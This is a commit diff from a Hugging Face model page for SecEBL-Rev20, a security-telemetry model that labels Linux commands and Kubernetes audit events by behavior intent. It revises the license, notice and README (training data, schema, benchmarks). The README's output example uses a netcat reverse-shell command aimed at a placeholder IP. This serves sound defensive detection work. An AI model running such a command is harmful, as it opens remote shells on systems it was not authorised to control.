Sentence Similarity
sentence-transformers
Joblib
Safetensors
modernbert
security
intrusion-detection
behavior-analytics
intent-recognition
linux
kubernetes
audit-log
text-embeddings-inference
Instructions to use willchen0011/SecEBL with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- sentence-transformers
How to use willchen0011/SecEBL with sentence-transformers:
from sentence_transformers import SentenceTransformer model = SentenceTransformer("willchen0011/SecEBL") sentences = [ "That is a happy person", "That is a happy dog", "That is a very happy person", "Today is a sunny day" ] embeddings = model.encode(sentences) similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [4, 4] - Notebooks
- Google Colab
- Kaggle
Commit ·
0edc8c9
1
Parent(s): 8ae30a3
Polish Hugging Face release docs
Browse files- LICENSE +4 -4
- NOTICE +2 -2
- README.md +353 -85
- l2_artifacts/README.md +16 -14
- l2_artifacts/tag_risk_policy.rev20.json +1 -2
- l2_artifacts/train_summary.json +3 -3
- schema/tags_schema_rev20.json +2 -2
- score_calibration.rev20.json +0 -1891
LICENSE
CHANGED
|
@@ -20,10 +20,10 @@ control, are controlled by, or are under common control with that entity.
|
|
| 20 |
"Control" means direct or indirect power to direct management, ownership of
|
| 21 |
fifty percent (50%) or more of outstanding shares, or beneficial ownership.
|
| 22 |
|
| 23 |
-
"Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas,
|
| 24 |
-
|
| 25 |
-
|
| 26 |
-
|
| 27 |
|
| 28 |
"Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
|
| 29 |
quantized, distilled, adapted, or otherwise transformed versions of the Model
|
|
|
|
| 20 |
"Control" means direct or indirect power to direct management, ownership of
|
| 21 |
fifty percent (50%) or more of outstanding shares, or beneficial ownership.
|
| 22 |
|
| 23 |
+
"Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas, model
|
| 24 |
+
configuration files, tokenizer additions, evaluation artifacts distributed with
|
| 25 |
+
the model, and other files that are expressly marked as licensed under this
|
| 26 |
+
license.
|
| 27 |
|
| 28 |
"Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
|
| 29 |
quantized, distilled, adapted, or otherwise transformed versions of the Model
|
NOTICE
CHANGED
|
@@ -1,8 +1,8 @@
|
|
| 1 |
SecEBL-Rev20
|
| 2 |
Copyright 2026 SecEBL contributors.
|
| 3 |
|
| 4 |
-
This Hugging Face repository contains SecEBL-Rev20 model artifacts,
|
| 5 |
-
metadata,
|
| 6 |
artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
|
| 7 |
|
| 8 |
SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
|
|
|
|
| 1 |
SecEBL-Rev20
|
| 2 |
Copyright 2026 SecEBL contributors.
|
| 3 |
|
| 4 |
+
This Hugging Face repository contains SecEBL-Rev20 model artifacts, schema
|
| 5 |
+
metadata, and an experimental L2 artifact. These model
|
| 6 |
artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
|
| 7 |
|
| 8 |
SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
|
README.md
CHANGED
|
@@ -20,95 +20,363 @@ tags:
|
|
| 20 |
**SecEBL** stands for **Security Event Behavior Labeler**.
|
| 21 |
|
| 22 |
SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
|
| 23 |
-
Linux command line or normalized Kubernetes AuditLog event into
|
| 24 |
-
behavior-intent
|
| 25 |
-
trying to do instead of only matching fixed strings,
|
| 26 |
-
opaque risk scores.
|
| 27 |
|
| 28 |
Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
|
| 29 |
|
| 30 |
-
##
|
| 31 |
|
| 32 |
-
|
| 33 |
-
|
| 34 |
-
|
| 35 |
-
|
| 36 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 37 |
|
| 38 |
-
|
| 39 |
-
|
| 40 |
-
|
| 41 |
-
persistence, data staging, cloud privilege changes, or service-health checks.
|
| 42 |
|
| 43 |
-
|
| 44 |
|
| 45 |
```text
|
| 46 |
-
|
| 47 |
-
|
| 48 |
-
|
| 49 |
-
-> alert / review / policy
|
| 50 |
```
|
| 51 |
|
| 52 |
-
L1
|
| 53 |
-
|
| 54 |
-
|
| 55 |
-
or `query_service_health`.
|
| 56 |
|
| 57 |
-
## What
|
| 58 |
|
| 59 |
-
This Hugging Face repository is the model artifact bundle.
|
| 60 |
-
not include training corpora, full final benchmarks, private pressure-stream
|
| 61 |
-
rows, raw run logs, or internal review files because parts of those materials
|
| 62 |
-
contain real telemetry or real operational context.
|
| 63 |
|
| 64 |
| Path | Purpose |
|
| 65 |
| --- | --- |
|
| 66 |
| `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
|
| 67 |
-
| `semantic_texts.jsonl` | Rev20
|
| 68 |
-
| `score_calibration.rev20.json` | Release calibration thresholds for tag selection. |
|
| 69 |
| `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
|
| 70 |
| `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
|
| 71 |
-
| `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 tag-selection
|
| 72 |
-
| `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary. |
|
| 73 |
| `LICENSE`, `NOTICE` | Model license and attribution notices. |
|
| 74 |
|
| 75 |
-
|
| 76 |
-
|
| 77 |
-
|
| 78 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 79 |
|
| 80 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 81 |
|
| 82 |
-
|
|
|
|
|
|
|
| 83 |
|
| 84 |
| Item | Count |
|
| 85 |
| --- | ---: |
|
| 86 |
| Top-level behavior groups | 12 |
|
| 87 |
| Behavior tags | 361 |
|
| 88 |
|
| 89 |
-
|
| 90 |
-
maliciousness. This makes the tags useful as an intermediate representation for
|
| 91 |
-
rules, analyst review, session scoring, and later sequence models.
|
| 92 |
-
|
| 93 |
-
## L1 Evaluation Snapshot
|
| 94 |
|
| 95 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 96 |
|
| 97 |
-
|
| 98 |
-
featurize-rev20-20260620-072423-ep128-bs112-latestdata
|
| 99 |
-
```
|
| 100 |
|
| 101 |
| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
|
| 102 |
| --- | ---: | ---: | ---: | ---: |
|
| 103 |
-
| Linux
|
| 104 |
-
| K8s
|
| 105 |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |
|
| 106 |
|
| 107 |
-
|
| 108 |
-
|
| 109 |
-
|
| 110 |
-
|
| 111 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 112 |
|
| 113 |
## L2 Artifact
|
| 114 |
|
|
@@ -116,26 +384,39 @@ This repository includes an experimental fitted L2 session scorer so the
|
|
| 116 |
companion GitHub `scripts/run_examples.sh` can run the public Linux example
|
| 117 |
sessions end to end when this model directory is used as `MODEL_DIR`.
|
| 118 |
|
| 119 |
-
|
| 120 |
-
|
| 121 |
-
|
| 122 |
-
a
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 123 |
|
| 124 |
Internal L2 summary:
|
| 125 |
|
| 126 |
| Check | Result |
|
| 127 |
| --- | ---: |
|
| 128 |
-
| Withheld Linux
|
| 129 |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
|
| 130 |
-
| OOF validation | 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
|
| 131 |
|
| 132 |
The 7M pressure-stream result was measured on real background telemetry plus
|
| 133 |
embedded synthetic attack sessions. The underlying rows and real session
|
| 134 |
-
identifiers are not redistributed.
|
|
|
|
| 135 |
|
| 136 |
-
##
|
| 137 |
|
| 138 |
-
|
| 139 |
|
| 140 |
```python
|
| 141 |
from sentence_transformers import SentenceTransformer
|
|
@@ -143,25 +424,12 @@ from sentence_transformers import SentenceTransformer
|
|
| 143 |
model = SentenceTransformer("willchen0011/SecEBL")
|
| 144 |
```
|
| 145 |
|
| 146 |
-
SecEBL is a retrieval-style labeler:
|
| 147 |
-
|
| 148 |
-
|
| 149 |
-
|
| 150 |
-
|
| 151 |
-
|
| 152 |
-
Example with the companion repository checked out next to this model snapshot:
|
| 153 |
-
|
| 154 |
-
```bash
|
| 155 |
-
git clone https://github.com/EBWi11/SecEBL.git
|
| 156 |
-
cd SecEBL
|
| 157 |
-
git lfs install
|
| 158 |
-
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
|
| 159 |
-
scripts/run_examples.sh
|
| 160 |
-
```
|
| 161 |
-
|
| 162 |
-
That script runs Linux and K8s public example L1 evaluation. Because this model
|
| 163 |
-
repository includes `l2_artifacts/logreg.joblib`, it also runs the Linux public
|
| 164 |
-
example L2 session scorer by default.
|
| 165 |
|
| 166 |
## Intended Use
|
| 167 |
|
|
@@ -169,7 +437,7 @@ example L2 session scorer by default.
|
|
| 169 |
- Internal security detection, investigation, and triage for systems an
|
| 170 |
organization owns, operates, administers, or is explicitly authorized to
|
| 171 |
defend.
|
| 172 |
-
- Building session-level risk scoring over SecEBL behavior-
|
| 173 |
|
| 174 |
## Out Of Scope
|
| 175 |
|
|
@@ -182,8 +450,8 @@ example L2 session scorer by default.
|
|
| 182 |
## License
|
| 183 |
|
| 184 |
The model artifacts are released under **SecEBL Model License 1.0**. This is an
|
| 185 |
-
open-weight restricted-use model license, not Apache-2.0 and not an
|
| 186 |
-
open source license.
|
| 187 |
|
| 188 |
The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
|
| 189 |
Source code, schemas, public examples, and helper scripts in the companion
|
|
|
|
| 20 |
**SecEBL** stands for **Security Event Behavior Labeler**.
|
| 21 |
|
| 22 |
SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
|
| 23 |
+
Linux command line or normalized Kubernetes AuditLog event into ranked
|
| 24 |
+
behavior-intent labels, so downstream detection can reason about what an actor
|
| 25 |
+
is trying to do instead of only matching fixed strings, allowlists, blacklists,
|
| 26 |
+
or opaque risk scores.
|
| 27 |
|
| 28 |
Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
|
| 29 |
|
| 30 |
+
## At A Glance
|
| 31 |
|
| 32 |
+
| Area | Current release summary |
|
| 33 |
+
| --- | --- |
|
| 34 |
+
| Stable public API | L1 behavior-intent labeling with ranked `top_labels`. |
|
| 35 |
+
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
|
| 36 |
+
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
|
| 37 |
+
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
|
| 38 |
+
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
|
| 39 |
+
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
|
| 40 |
+
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
|
| 41 |
+
| Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |
|
| 42 |
+
|
| 43 |
+
The public examples are intentionally smaller than the internal benchmark data.
|
| 44 |
+
They exist so users can run the model locally and inspect outputs without access
|
| 45 |
+
to private telemetry. The full training corpora, internal benchmarks, private
|
| 46 |
+
pressure-stream rows, and private run logs are not redistributed because parts
|
| 47 |
+
of them contain real telemetry or real operational context.
|
| 48 |
+
|
| 49 |
+
## First-Time User Path
|
| 50 |
+
|
| 51 |
+
Use the companion GitHub repository for the runnable code and this Hugging Face
|
| 52 |
+
repository for model artifacts:
|
| 53 |
+
|
| 54 |
+
```bash
|
| 55 |
+
git clone https://github.com/EBWi11/SecEBL.git
|
| 56 |
+
cd SecEBL
|
| 57 |
+
|
| 58 |
+
git lfs install
|
| 59 |
+
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
|
| 60 |
|
| 61 |
+
pip install -e .
|
| 62 |
+
scripts/run_examples.sh
|
| 63 |
+
```
|
|
|
|
| 64 |
|
| 65 |
+
After the script finishes, inspect:
|
| 66 |
|
| 67 |
```text
|
| 68 |
+
runs/examples/linux_l1/predictions.jsonl
|
| 69 |
+
runs/examples/k8s_l1/predictions.jsonl
|
| 70 |
+
runs/examples/l2/example_linux_session_results.json
|
|
|
|
| 71 |
```
|
| 72 |
|
| 73 |
+
L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
|
| 74 |
+
not an intrusion verdict. L2 is optional and experimental; it runs only when an
|
| 75 |
+
L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.
|
|
|
|
| 76 |
|
| 77 |
+
## What This Repository Contains
|
| 78 |
|
| 79 |
+
This Hugging Face repository is the model artifact bundle.
|
|
|
|
|
|
|
|
|
|
| 80 |
|
| 81 |
| Path | Purpose |
|
| 82 |
| --- | --- |
|
| 83 |
| `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
|
| 84 |
+
| `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. |
|
|
|
|
| 85 |
| `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
|
| 86 |
| `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
|
| 87 |
+
| `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
|
| 88 |
+
| `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
|
| 89 |
| `LICENSE`, `NOTICE` | Model license and attribution notices. |
|
| 90 |
|
| 91 |
+
This repository does not include the runnable helper scripts. Use
|
| 92 |
+
[EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package, public
|
| 93 |
+
examples, and one-command test script.
|
| 94 |
+
|
| 95 |
+
## Output Shape
|
| 96 |
+
|
| 97 |
+
L1 predictions expose ranked `top_labels`:
|
| 98 |
+
|
| 99 |
+
```json
|
| 100 |
+
{
|
| 101 |
+
"observation_id": "event:0",
|
| 102 |
+
"command": "nc -e /bin/sh 203.0.113.10 4444",
|
| 103 |
+
"top_labels": [
|
| 104 |
+
{
|
| 105 |
+
"label_id": "spawn_reverse_shell",
|
| 106 |
+
"score": 0.811,
|
| 107 |
+
"axis": "execution_and_process"
|
| 108 |
+
},
|
| 109 |
+
{
|
| 110 |
+
"label_id": "connect_external_service",
|
| 111 |
+
"score": 0.488,
|
| 112 |
+
"axis": "network"
|
| 113 |
+
}
|
| 114 |
+
]
|
| 115 |
+
}
|
| 116 |
+
```
|
| 117 |
+
|
| 118 |
+
L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
|
| 119 |
+
threshold. `behavior_tags[]` is the field used by training and evaluation label
|
| 120 |
+
files. Runtime prediction output is ranked `top_labels`.
|
| 121 |
+
|
| 122 |
+
## Why Intent Labels Matter
|
| 123 |
+
|
| 124 |
+
Traditional IDS pipelines often depend on signatures, rules, allowlists,
|
| 125 |
+
blacklists, and low-explainability tabular ML. Those tools still matter, but
|
| 126 |
+
they can struggle when legitimate tools are used in suspicious ways, when tool
|
| 127 |
+
syntax drifts quickly, or when the same behavior appears in different telemetry
|
| 128 |
+
formats.
|
| 129 |
+
|
| 130 |
+
SecEBL adds an intermediate representation:
|
| 131 |
+
|
| 132 |
+
```text
|
| 133 |
+
raw security event
|
| 134 |
+
-> L1 behavior-intent recognition
|
| 135 |
+
-> L2 session reasoning or another downstream detector
|
| 136 |
+
-> alert / review / policy
|
| 137 |
+
```
|
| 138 |
+
|
| 139 |
+
L1 intentionally does not decide that a single event is an intrusion. It
|
| 140 |
+
produces explainable behavior evidence such as `read_credential_material`,
|
| 141 |
+
`execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
|
| 142 |
+
or `query_service_health`.
|
| 143 |
+
|
| 144 |
+
This is useful for:
|
| 145 |
|
| 146 |
+
- LOLT / living-off-the-land behavior where the tool is legitimate but the
|
| 147 |
+
behavior may be suspicious in context.
|
| 148 |
+
- Rule-writing lag, where new tool syntax appears faster than signatures can be
|
| 149 |
+
maintained.
|
| 150 |
+
- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
|
| 151 |
+
future telemetry can share a behavior vocabulary.
|
| 152 |
+
- Explainable detection, where an alert should be tied to explicit behavior
|
| 153 |
+
labels rather than only an opaque score.
|
| 154 |
|
| 155 |
+
## Data And Vocabulary
|
| 156 |
+
|
| 157 |
+
Rev20 is a flat behavior-tag schema.
|
| 158 |
|
| 159 |
| Item | Count |
|
| 160 |
| --- | ---: |
|
| 161 |
| Top-level behavior groups | 12 |
|
| 162 |
| Behavior tags | 361 |
|
| 163 |
|
| 164 |
+
Schema groups:
|
|
|
|
|
|
|
|
|
|
|
|
|
| 165 |
|
| 166 |
+
| Group | Tags |
|
| 167 |
+
| --- | ---: |
|
| 168 |
+
| `observation_and_discovery` | 51 |
|
| 169 |
+
| `configuration_and_log_modification` | 12 |
|
| 170 |
+
| `filesystem_and_data` | 33 |
|
| 171 |
+
| `execution_and_process` | 28 |
|
| 172 |
+
| `network` | 51 |
|
| 173 |
+
| `identity_auth_and_secrets` | 31 |
|
| 174 |
+
| `persistence_services_and_storage` | 27 |
|
| 175 |
+
| `kernel_memory_and_tracing` | 14 |
|
| 176 |
+
| `package_build_and_source` | 19 |
|
| 177 |
+
| `database_and_infrastructure_services` | 33 |
|
| 178 |
+
| `containers_and_cloud_native` | 34 |
|
| 179 |
+
| `cloud_control_plane` | 28 |
|
| 180 |
+
|
| 181 |
+
The release baseline was trained from internal Rev20 corpora:
|
| 182 |
+
|
| 183 |
+
| Corpus | Rows | Unique behavior tags | Notes |
|
| 184 |
+
| --- | ---: | ---: | --- |
|
| 185 |
+
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
|
| 186 |
+
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |
|
| 187 |
+
|
| 188 |
+
The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
|
| 189 |
+
conservative executable-name estimate. Common families include shell utilities,
|
| 190 |
+
network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
|
| 191 |
+
databases, secret stores, and Kubernetes tooling. Frequent examples include
|
| 192 |
+
`curl`, `kubectl`, `aws`, `grep`, `cat`, `systemctl`, `find`, `ssh`, `docker`,
|
| 193 |
+
`git`, `redis-cli`, `journalctl`, `psql`, `gcloud`, `mysql`, `az`, `nmap`,
|
| 194 |
+
`vault`, and `terraform`.
|
| 195 |
+
|
| 196 |
+
Top Linux corpus tags:
|
| 197 |
+
|
| 198 |
+
| Tag | Count |
|
| 199 |
+
| --- | ---: |
|
| 200 |
+
| `stage_temporary_path` | 5,179 |
|
| 201 |
+
| `read_credential_material` | 4,512 |
|
| 202 |
+
| `read_infrastructure_config` | 3,427 |
|
| 203 |
+
| `upload_external_content` | 1,886 |
|
| 204 |
+
| `stage_hidden_path` | 1,580 |
|
| 205 |
+
| `search_credentials` | 1,488 |
|
| 206 |
+
| `modify_service_state` | 1,459 |
|
| 207 |
+
| `upload_sensitive_content` | 1,424 |
|
| 208 |
+
| `read_business_data` | 1,378 |
|
| 209 |
+
| `execute_remote_command` | 1,374 |
|
| 210 |
+
|
| 211 |
+
Top K8s corpus tags:
|
| 212 |
+
|
| 213 |
+
| Tag | Count |
|
| 214 |
+
| --- | ---: |
|
| 215 |
+
| `modify_workload` | 221 |
|
| 216 |
+
| `enumerate_cluster_resources` | 131 |
|
| 217 |
+
| `modify_cluster_auth_policy` | 53 |
|
| 218 |
+
| `modify_route` | 49 |
|
| 219 |
+
| `execute_in_workload` | 47 |
|
| 220 |
+
| `inspect_workload` | 45 |
|
| 221 |
+
| `grant_cluster_privilege` | 39 |
|
| 222 |
+
| `modify_firewall_policy` | 38 |
|
| 223 |
+
| `modify_verification_material` | 37 |
|
| 224 |
+
| `inspect_auth_policy` | 33 |
|
| 225 |
+
|
| 226 |
+
## Training Details
|
| 227 |
+
|
| 228 |
+
The raw training corpora are not redistributed, but the following details are
|
| 229 |
+
documented so readers can understand the model scale and method.
|
| 230 |
+
|
| 231 |
+
| Item | Value |
|
| 232 |
+
| --- | --- |
|
| 233 |
+
| Base model | `Alibaba-NLP/gte-modernbert-base` |
|
| 234 |
+
| Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches |
|
| 235 |
+
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` |
|
| 236 |
+
| Epochs | 128 full-pass epochs |
|
| 237 |
+
| Batch size | 112 |
|
| 238 |
+
| Precision | `fp32` |
|
| 239 |
+
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
|
| 240 |
+
| Runtime | 58,291 seconds, about 16.2 hours |
|
| 241 |
+
| Sequence length | 160 tokens |
|
| 242 |
+
| Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` |
|
| 243 |
+
|
| 244 |
+
Training data scale:
|
| 245 |
+
|
| 246 |
+
| Training artifact | Count | Notes |
|
| 247 |
+
| --- | ---: | --- |
|
| 248 |
+
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
|
| 249 |
+
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
|
| 250 |
+
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
|
| 251 |
+
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
|
| 252 |
+
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
|
| 253 |
+
|
| 254 |
+
The Linux corpus is intentionally mixed rather than a single synthetic source.
|
| 255 |
+
The largest source slices are roughly 36.9k generated rows, 28.5k manually
|
| 256 |
+
reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
|
| 257 |
+
rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
|
| 258 |
+
batch rows, plus smaller targeted boundary, miss-review, public-attack, and
|
| 259 |
+
high-miss batches.
|
| 260 |
+
|
| 261 |
+
Token lengths are short enough for a compact encoder. Across the final pair set,
|
| 262 |
+
command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
|
| 263 |
+
0.3% of examples exceed the 160-token training limit. Label-side semantic texts
|
| 264 |
+
are p50 40 tokens and p95 62.
|
| 265 |
+
|
| 266 |
+
Hard negatives were designed in two layers:
|
| 267 |
+
|
| 268 |
+
- Schema-level negatives: the dataset builder used `schema_hard`, with a
|
| 269 |
+
16-item hard-negative pool and up to 8 negatives per positive before MNRL
|
| 270 |
+
batching. These negatives come from semantically nearby Rev20 tags, so the
|
| 271 |
+
model is forced to separate labels such as read-vs-search, inspect-vs-modify,
|
| 272 |
+
local-vs-remote execution, and similar tool-boundary cases.
|
| 273 |
+
- Batch-level negatives: the training loader used hard-negative-aware MNRL
|
| 274 |
+
batches. The final run used config
|
| 275 |
+
`rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
|
| 276 |
+
placing 2 hard-negative labels near each anchor where possible.
|
| 277 |
+
- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
|
| 278 |
+
producing 1,766 extra training exposures. These rows target recurring failure
|
| 279 |
+
modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
|
| 280 |
+
no-hit review cases, and post-evaluation miss-review batches.
|
| 281 |
+
|
| 282 |
+
## Evaluation Snapshot
|
| 283 |
+
|
| 284 |
+
The internal benchmark data is not public. The aggregate size, distribution,
|
| 285 |
+
and metrics are public so users can understand what the headline numbers mean.
|
| 286 |
+
|
| 287 |
+
Evaluation scale:
|
| 288 |
+
|
| 289 |
+
| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
|
| 290 |
+
| --- | ---: | ---: | ---: | ---: |
|
| 291 |
+
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
|
| 292 |
+
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
|
| 293 |
+
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |
|
| 294 |
|
| 295 |
+
Retrieval quality:
|
|
|
|
|
|
|
| 296 |
|
| 297 |
| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
|
| 298 |
| --- | ---: | ---: | ---: | ---: |
|
| 299 |
+
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
|
| 300 |
+
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
|
| 301 |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |
|
| 302 |
|
| 303 |
+
The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
|
| 304 |
+
complex multi-tag command rows. The K8s result should be read as a small-domain
|
| 305 |
+
sanity result rather than broad Kubernetes coverage because the current K8s
|
| 306 |
+
corpus is much smaller than the Linux corpus.
|
| 307 |
+
|
| 308 |
+
Internal Linux benchmark tag cardinality:
|
| 309 |
+
|
| 310 |
+
| Tags per row | Rows |
|
| 311 |
+
| --- | ---: |
|
| 312 |
+
| 0 | 705 |
|
| 313 |
+
| 1 | 8,829 |
|
| 314 |
+
| 2 | 1,567 |
|
| 315 |
+
| 3 | 901 |
|
| 316 |
+
| 4 | 402 |
|
| 317 |
+
| 5 | 139 |
|
| 318 |
+
| 6+ | 51 |
|
| 319 |
+
|
| 320 |
+
Top internal Linux benchmark tags:
|
| 321 |
+
|
| 322 |
+
| Tag | Count |
|
| 323 |
+
| --- | ---: |
|
| 324 |
+
| `stage_temporary_path` | 987 |
|
| 325 |
+
| `inspect_network_state` | 801 |
|
| 326 |
+
| `stage_hidden_path` | 655 |
|
| 327 |
+
| `inspect_current_identity` | 578 |
|
| 328 |
+
| `read_credential_material` | 551 |
|
| 329 |
+
| `inspect_system_state` | 481 |
|
| 330 |
+
| `inspect_infrastructure_service` | 390 |
|
| 331 |
+
| `query_dns_records` | 372 |
|
| 332 |
+
| `enumerate_filesystem` | 365 |
|
| 333 |
+
| `search_credentials` | 315 |
|
| 334 |
+
|
